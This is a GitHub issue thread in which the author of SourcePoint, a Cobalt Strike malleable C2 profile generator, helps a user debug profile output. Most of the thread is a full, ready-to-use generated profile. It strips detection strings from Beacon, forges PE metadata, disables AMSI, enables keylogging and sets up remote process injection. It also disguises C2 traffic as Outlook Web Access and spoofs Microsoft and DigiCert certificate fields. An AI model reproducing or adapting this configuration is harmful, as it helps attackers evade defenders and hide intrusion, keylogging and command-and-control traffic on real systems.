Closed vysecurity closed 3 years ago
Sorry, I am a bit confused, there isn't a spawnto_x86 or spawnto_x64 in the stage field that's in the <.post-ex>. Here's an example of one I just made.
./SourcePoint -Yaml ../../Documents/Important-Docs/SourcePoint/Sample.yaml
_____ ____ _ __
/ ___/____ __ _______________ / __ \____ (_)___ / /_
\__ \/ __ \/ / / / ___/ ___/ _ \/ /_/ / __ \/ / __ \/ __/
___/ / /_/ / /_/ / / / /__/ __/ ____/ /_/ / / / / / /_
/____/\____/\__,_/_/ \___/\___/_/ \____/_/_/ /_/\__/
(@Tyl0us)
[*] Preparing Varibles...
[*] Building Profile...
[!] Host Staging Is Disabled - Staged Payloads Are Not Available But Your Beacon Payload Is Not Available To Anyone That Connects
[*] Post-Ex Process Name: gpupdate.exe
[*] Seleted Profile: Slack
[+] Profile Generated: acme.profile
[+] Happy Hacking
cat acme.profile
Think I just typed sourcepoint, it prompts first arg, so I put it in, it errors, then I put in second arg, then it errors, then by 3rd arg it generated something.
Will check again later.
On Mon, 9 Aug 2021 at 00:11, Tylous @.***> wrote:
Sorry, I am a bit confused, there isn't a spawnto_x86 or spawnto_x64 in the stage field that's in the <.post-ex>. Here's an example of one I just made.
./SourcePoint -Yaml ../../Documents/Important-Docs/SourcePoint/Sample.yaml
_____ ____ _ __ / ___/____ __ _______________ / __ \____ (_)___ / /_ \__ \/ __ \/ / / / ___/ ___/ _ \/ /_/ / __ \/ / __ \/ __/
/ / // / // / / / // / ____/ // / / / / / / //\/_,// _/_// ____/// //\/ @.***)
[] Preparing Varibles... [] Building Profile... [!] Host Staging Is Disabled - Staged Payloads Are Not Available But Your Beacon Payload Is Not Available To Anyone That Connects [] Post-Ex Process Name: gpupdate.exe [] Seleted Profile: Slack [+] Profile Generated: acme.profile [+] Happy Hacking cat acme.profile
post-ex {
control the temporary process we spawn to
set spawnto_x86 "%windir%\syswow64\gpupdate.exe"; set spawnto_x64 "%windir%\sysnative\gpupdate.exe";
# change the permissions and content of our post-ex DLLs set obfuscate "true"; # pass key function pointers from Beacon to its child jobs set smartinject "true"; # disable AMSI in powerpick, execute-assembly, and psinject set amsi_disable "true";
control the method used to log keystrokes
set keylogger "SetWindowsHookEx"; }
Can you provide me the command line arguments you input so I can attempt to replicate this?
— You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub https://github.com/Tylous/SourcePoint/issues/1#issuecomment-894819794, or unsubscribe https://github.com/notifications/unsubscribe-auth/AA3N7UXT4ONMDIXBMB3AROLT32UEFANCNFSM5BYKI6CA .
Just following up on this?
./SourcePoint -Outfile example.profile -Host HOST -Injector NtMapViewOfSection
So I ran your command and this is the output I got. The Stage section properly closes and Spawnto is in the properly place, post-ex.
set host_stage "False";
set sleeptime "49000";
set jitter "22";
set useragent "Mozilla/4.0 (X11; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0";
set data_jitter "50";
set smb_frame_header "";
set pipename "atsvc-4081";
set pipename_stager "atsvc-7243";
set tcp_frame_header "";
set ssh_banner "Welcome to Ubuntu 19.10.0 LTS (GNU/Linux 4.4.0-19037-aws x86_64)";
set ssh_pipename "atsvc-##";
####Manaully add these if your doing C2 over DNS (Future Release)####
##dns-beacon {
# set dns_idle "1.2.3.4";
# set dns_max_txt "199";
# set dns_sleep "1";
# set dns_ttl "5";
# set maxdns "200";
# set dns_stager_prepend "doc-stg-prepend";
# set dns_stager_subhost "doc-stg-sh.";
# set beacon "doc.bc.";
# set get_A "doc.1a.";
# set get_AAAA "doc.4a.";
# set get_TXT "doc.tx.";
# set put_metadata "doc.md.";
# set put_output "doc.po.";
# set ns_response "zero";
#}
stage {
set obfuscate "true";
set stomppe "true";
set cleanup "true";
set userwx "false";
set smartinject "true";
#TCP and SMB beacons will obfuscate themselves while they wait for a new connection.
#They will also obfuscate themselves while they wait to read information from their parent Beacon.
set sleep_mask "true";
set checksum "0";
set compile_time "09 Jul 1995 05:50:04";
set entry_point "137648";
set image_size_x86 "761856";
set image_size_x64 "761856";
set name "ActivationManager.dll";
set rich_header "\x80\x48\xf3\x2d\xc4\x29\x9d\x7e\xc4\x29\x9d\x7e\xc4\x29\x9d\x7e\xcd\x51\x0e\x7e\x6f\x29\x9d\x7e\x9f\x41\x99\x7f\xd0\x29\x9d\x7e\x9f\x41\x9e\x7f\xc7\x29\x9d\x7e\x9f\x41\x98\x7f\xdb\x29\x9d\x7e\xc4\x29\x9c\x7e\x37\x2c\x9d\x7e\x9f\x41\x9c\x7f\xcc\x29\x9d\x7e\x9f\x41\x9d\x7f\xc5\x29\x9d\x7e\x9f\x41\x93\x7f\x97\x29\x9d\x7e\x9f\x41\x60\x7e\xc5\x29\x9d\x7e\x9f\x41\x62\x7e\xc5\x29\x9d\x7e\x9f\x41\x9f\x7f\xc5\x29\x9d\x7e\x52\x69\x63\x68\xc4\x29\x9d\x7e\x00\x00\x00\x00\x00\x00\x00\x00";
transform-x86 {
prepend "\x90\x90\x90"; # NOP, NOP!
strrep "ReflectiveLoader" "";
strrep "This program cannot be run in DOS mode" "";
strrep "NtQueueApcThread" "";
strrep "IsWow64Process" "";
strrep "HTTP/1.1 200 OK" "";
strrep "Stack memory was corrupted" "";
strrep "kernel32" "";
strrep "beacon.dll" "";
strrep "KERNEL32.dll" "";
strrep "ADVAPI32.dll" "";
strrep "WININET.dll" "";
strrep "WS2_32.dll" "";
strrep "DNSAPI.dll" "";
strrep "Secur32.dll" "";
strrep "VirtualProtectEx" "";
strrep "VirtualProtect" "";
strrep "VirtualAllocEx" "";
strrep "VirtualAlloc" "";
strrep "VirtualFree" "";
strrep "VirtualQuery" "";
strrep "RtlVirtualUnwind" "";
strrep "sAlloc" "";
strrep "FlsFree" "";
strrep "FlsGetValue" "";
strrep "FlsSetValue" "";
strrep "InitializeCriticalSectionEx" "";
strrep "CreateSemaphoreExW" "";
strrep "SetThreadStackGuarantee" "";
strrep "CreateThreadpoolTimer" "";
strrep "SetThreadpoolTimer" "";
strrep "WaitForThreadpoolTimerCallbacks" "";
strrep "CloseThreadpoolTimer" "";
strrep "CreateThreadpoolWait" "";
strrep "SetThreadpoolWait" "";
strrep "CloseThreadpoolWait" "";
strrep "FlushProcessWriteBuffers" "";
strrep "FreeLibraryWhenCallbackReturns" "";
strrep "GetCurrentProcessorNumber" "";
strrep "GetLogicalProcessorInformation" "";
strrep "CreateSymbolicLinkW" "";
strrep "SetDefaultDllDirectories" "";
strrep "EnumSystemLocalesEx" "";
strrep "CompareStringEx" "";
strrep "GetDateFormatEx" "";
strrep "GetLocaleInfoEx" "";
strrep "GetTimeFormatEx" "";
strrep "GetUserDefaultLocaleName" "";
strrep "IsValidLocaleName" "";
strrep "LCMapStringEx" "";
strrep "GetCurrentPackageId" "";
strrep "UNICODE" "";
strrep "UTF-8" "";
strrep "UTF-16LE" "";
strrep "MessageBoxW" "";
strrep "GetActiveWindow" "";
strrep "GetLastActivePopup" "";
strrep "GetUserObjectInformationW" "";
strrep "GetProcessWindowStation" "";
strrep "Sunday" "";
strrep "Monday" "";
strrep "Tuesday" "";
strrep "Wednesday" "";
strrep "Thursday" "";
strrep "Friday" "";
strrep "Saturday" "";
strrep "January" "";
strrep "February" "";
strrep "March" "";
strrep "April" "";
strrep "June" "";
strrep "July" "";
strrep "August" "";
strrep "September" "";
strrep "October" "";
strrep "November" "";
strrep "December" "";
strrep "MM/dd/yy" "";
strrep "Stack memory around _alloca was corrupted" "";
strrep "Unknown Runtime Check Error" "";
strrep "Unknown Filename" "";
strrep "Unknown Module Name" "";
strrep "Run-Time Check Failure #%d - %s" "";
strrep "Stack corrupted near unknown variable" "";
strrep "Stack pointer corruption" "";
strrep "Cast to smaller type causing loss of data" "";
strrep "Stack memory corruption" "";
strrep "Local variable used before initialization" "";
strrep "Stack around _alloca corrupted" "";
strrep "RegOpenKeyExW" "";
strrep "egQueryValueExW" "";
strrep "RegCloseKey" "";
strrep "LibTomMath" "";
strrep "Wow64DisableWow64FsRedirection" "";
strrep "Wow64RevertWow64FsRedirection" "";
strrep "Kerberos" "";
}
transform-x64 {
prepend "\x90\x90\x90"; # NOP, NOP!
strrep "ReflectiveLoader" "";
strrep "This program cannot be run in DOS mode" "";
strrep "beacon.x64.dll" "";
strrep "NtQueueApcThread" "";
strrep "IsWow64Process" "";
strrep "HTTP/1.1 200 OK" "";
strrep "Stack memory was corrupted" "";
strrep "kernel32" "";
strrep "beacon.dll" "";
strrep "KERNEL32.dll" "";
strrep "ADVAPI32.dll" "";
strrep "WININET.dll" "";
strrep "WS2_32.dll" "";
strrep "DNSAPI.dll" "";
strrep "Secur32.dll" "";
strrep "VirtualProtectEx" "";
strrep "VirtualProtect" "";
strrep "VirtualAllocEx" "";
strrep "VirtualAlloc" "";
strrep "VirtualFree" "";
strrep "VirtualQuery" "";
strrep "RtlVirtualUnwind" "";
strrep "sAlloc" "";
strrep "FlsFree" "";
strrep "FlsGetValue" "";
strrep "FlsSetValue" "";
strrep "InitializeCriticalSectionEx" "";
strrep "CreateSemaphoreExW" "";
strrep "SetThreadStackGuarantee" "";
strrep "CreateThreadpoolTimer" "";
strrep "SetThreadpoolTimer" "";
strrep "WaitForThreadpoolTimerCallbacks" "";
strrep "CloseThreadpoolTimer" "";
strrep "CreateThreadpoolWait" "";
strrep "SetThreadpoolWait" "";
strrep "CloseThreadpoolWait" "";
strrep "FlushProcessWriteBuffers" "";
strrep "FreeLibraryWhenCallbackReturns" "";
strrep "GetCurrentProcessorNumber" "";
strrep "GetLogicalProcessorInformation" "";
strrep "CreateSymbolicLinkW" "";
strrep "SetDefaultDllDirectories" "";
strrep "EnumSystemLocalesEx" "";
strrep "CompareStringEx" "";
strrep "GetDateFormatEx" "";
strrep "GetLocaleInfoEx" "";
strrep "GetTimeFormatEx" "";
strrep "GetUserDefaultLocaleName" "";
strrep "IsValidLocaleName" "";
strrep "LCMapStringEx" "";
strrep "GetCurrentPackageId" "";
strrep "UNICODE" "";
strrep "UTF-8" "";
strrep "UTF-16LE" "";
strrep "MessageBoxW" "";
strrep "GetActiveWindow" "";
strrep "GetLastActivePopup" "";
strrep "GetUserObjectInformationW" "";
strrep "GetProcessWindowStation" "";
strrep "Sunday" "";
strrep "Monday" "";
strrep "Tuesday" "";
strrep "Wednesday" "";
strrep "Thursday" "";
strrep "Friday" "";
strrep "Saturday" "";
strrep "January" "";
strrep "February" "";
strrep "March" "";
strrep "April" "";
strrep "June" "";
strrep "July" "";
strrep "August" "";
strrep "September" "";
strrep "October" "";
strrep "November" "";
strrep "December" "";
strrep "MM/dd/yy" "";
strrep "Stack memory around _alloca was corrupted" "";
strrep "Unknown Runtime Check Error" "";
strrep "Unknown Filename" "";
strrep "Unknown Module Name" "";
strrep "Run-Time Check Failure #%d - %s" "";
strrep "Stack corrupted near unknown variable" "";
strrep "Stack pointer corruption" "";
strrep "Cast to smaller type causing loss of data" "";
strrep "Stack memory corruption" "";
strrep "Local variable used before initialization" "";
strrep "Stack around _alloca corrupted" "";
strrep "RegOpenKeyExW" "";
strrep "egQueryValueExW" "";
strrep "RegCloseKey" "";
strrep "LibTomMath" "";
strrep "Wow64DisableWow64FsRedirection" "";
strrep "Wow64RevertWow64FsRedirection" "";
strrep "Kerberos" "";
}
}
process-inject {
# set remote memory allocation technique
set allocator "NtMapViewOfSection";
# shape the content and properties of what we will inject
set min_alloc "34775";
set userwx "false";
set startrwx "true";
transform-x86 {
prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # NOP, NOP!
}
transform-x64 {
prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # NOP, NOP!
}
# specify how we execute code in the remote process
execute {
CreateThread "ntdll.dll!RtlUserThreadStart+0x2175";
NtQueueApcThread-s;
SetThreadContext;
CreateRemoteThread;
CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
RtlCreateUserThread;
}
}
post-ex {
# control the temporary process we spawn to
set spawnto_x86 "%windir%\\syswow64\\wlanext.exe";
set spawnto_x64 "%windir%\\sysnative\\wlanext.exe";
# change the permissions and content of our post-ex DLLs
set obfuscate "true";
# pass key function pointers from Beacon to its child jobs
set smartinject "true";
# disable AMSI in powerpick, execute-assembly, and psinject
set amsi_disable "true";
# control the method used to log keystrokes
set keylogger "SetWindowsHookEx";
}
http-get {
set uri "YRvO5njvARYXbTZarF6VNXVwOUvqiCbSVJd1Vz ";
client {
header "Host" "HOST";
header "Accept" "*/*";
header "Cookie" "MicrosoftApplicationsTelemetryDeviceId=95c18d8-4dce9854;ClientId=1C0F6C5D910F9;MSPAuth=3EkAjDKjI;xid=730bf7;wla42=ZG0yMzA2KjEs";
metadata {
base64url;
parameter "wa";
}
parameter "path" "/calendar";
}
server {
header "Cache-Control" "no-cache";
header "Pragma" "no-cache";
header "Content-Type" "text/html; charset=utf-8";
header "Server" "Microsoft-IIS/10.0";
header "request-id" "6cfcf35d-0680-4853-98c4-b16723708fc9";
header "X-CalculatedBETarget" "BY2PR06MB549.namprd0<no value>.prod.outlook.com";
header "X-Content-Type-Options" "nosniff";
header "X-OWA-Version" "15.1.1240.20";
header "X-OWA-OWSVersion" "V2017_06_15";
header "X-OWA-MinimumSupportedOWSVersion" "V2_6";
header "X-Frame-Options" "SAMEORIGIN";
header "X-DiagInfo" "BY2PR06MB549";
header "X-UA-Compatible" "IE=EmulateIE7";
header "X-Powered-By" "ASP.NET";
header "X-FEServer" "CY4PR02CA0010";
header "Connection" "close";
output {
base64url;
print;
}
}
}
http-post {
set uri "MUTvuasCYDLZpAA7tWN4qYPctdJqxYv5b-DRkyX ";
set verb "GET";
client {
header "Host" "HOST";
header "Accept" "*/*";
output {
base64url;
parameter "wa";
}
id {
base64url;
prepend "wla42=";
prepend "xid=730bf7;";
prepend "MSPAuth=3EkAjDKjI;";
prepend "ClientId=1C0F6C5D910F9;";
prepend "MicrosoftApplicationsTelemetryDeviceId=95c18d8-4dce9854;";
header "Cookie";
}
}
server {
header "Cache-Control" "no-cache";
header "Pragma" "no-cache";
header "Content-Type" "text/html; charset=utf-8";
header "Server" "Microsoft-IIS/10.0";
header "request-id" "6cfcf35d-0680-4853-98c4-b16723708fc9";
header "X-CalculatedBETarget" "BY2PR06MB549.namprd0<no value>.prod.outlook.com";
header "X-Content-Type-Options" "nosniff";
header "X-OWA-Version" "15.1.1240.20";
header "X-OWA-OWSVersion" "V2017_06_15";
header "X-OWA-MinimumSupportedOWSVersion" "V2_6";
header "X-Frame-Options" "SAMEORIGIN";
header "X-DiagInfo" "BY2PR06MB549";
header "X-UA-Compatible" "IE=EmulateIE7";
header "X-Powered-By" "ASP.NET";
header "X-FEServer" "CY4PR02CA0010";
header "Connection" "close";
output {
base64url;
print;
}
}
}
http-stager {
set uri_x86 "/rpc/11481048";
set uri_x64 "/rpc/13651856";
client {
header "Host" "HOST";
header "Accept" "*/*";
}
server {
header "Server" "nginx";
}
}
set O "Microsoft Corporation"; #Organization Name
set C "US"; #Country
set L "Redmond"; #Locality
set OU "DigiCert Inc"; #Organizational Unit Name
set ST "Washington"; #State or Province
set validity "365"; #Number of days the cert is valid for
}
I am not sure what your issue is but if you could please provide a detailed description of the issue with the raw output, I will be happy to troubleshoot and fix it.
Odd maybe I used an older update?